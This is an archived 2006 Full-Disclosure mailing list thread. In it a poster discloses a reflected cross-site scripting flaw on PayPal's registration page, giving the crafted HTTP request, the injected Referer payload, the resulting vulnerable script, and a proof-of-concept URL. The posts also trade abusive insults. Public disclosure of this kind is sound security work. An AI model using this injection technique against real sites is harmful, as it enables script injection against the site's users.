|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-disclosure] paypal.com xss (was Re: micosoft.com xss)
From: Thomas Pollet (thomas.pollet
gmail.com)
Date: Tue Aug 08 2006 - 08:51:35 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Man you suck, codes or stfu.
I know the code is broken in more than 1 place, i tried registering event
handlers, exiting jscript etc. etc. time to move on....
point is xss is everywhere, trust noone etc. etc.
To make my point clear... last of the xsspaypal...
GET https://www.paypal.com/cgi-bin/webscr?cmd=_registration-run HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/msword, application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, */*
Referer:
https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison
";alert("xss");var%20f="
results in
....
<script type="text/javascript">
<!--
/* SiteCatalyst Variables */
s.pageName="SignUp:Landing Page";
s.prop11="general/SignupInitial.xsl::_registration-run::0";
s.channel="Sign Up:Landing Page";
s.r="
https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison
";alert("xss");var%20f="";
s.prop7="Unknown";
s.prop8="Unknown";
s.prop9="Unknown";
s.prop10="US";
s.prop12="Unknown";
s.visitorSampling="20";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code) // -->
</script>
in other words.... referer url isn't correctly cleaned for paypal
registration page and used for js var.
poc: go to
https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison
";alert("xss");s.r="
and click on the sign up link
Have a nice life, die soon,
Thomas
On 08/08/06, Mad World <penetratorhome.in.th> wrote:
>
> Good morning !
>
> You can doubt, it's your right to do so.
> Wanna bet ?
> Just open your eyes and your nose will show you that you are actually
> braking silly structure of page in more than one place ..
> I's relatively easy using the same exact place of code you tried to make
> it.
> I have working example, it is based on other microsoft "features" as well.
>
> Greets,
> - Mad World
>
> --- thomas.polletgmail.com wrote:
>
> From: "Thomas Pollet" <thomas.polletgmail.com>
> To: penetratorhome.in.th
> Cc: full-disclosurelists.grok.org.uk
> Subject: Re: [Full-disclosure] Re: micosoft.com xss
> Date: Tue, 8 Aug 2006 10:18:56 +0200
>
> On 08/08/06, Mad World <penetratorhome.in.th> wrote:
>
> Why do you need it ?
> You already discovered xss, the rest of "job" is just matter
> of technique.
> I think majority of xss submitters here could do it by
> various means.
> M$ is lost in its own complexity of how to do simple things.
> If you could ever give me reasonable answer for why do you
> need this $hit - I could give you the "rest", like others
> could.
>
> I doubt you actually tried getting js executed on page load
> (for some reason they try to prevent xss in a number of ways).
> I did try and didn't succeed, that's why I ask.
> Greets,
> Thomas
>
>
>
> _____________________________________________________________
> Visit Thailand http://www.sawadee.com
> Websearch and email: DNSASIA.com .... FAST!
> 128k dialup: login.samuinet.com
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]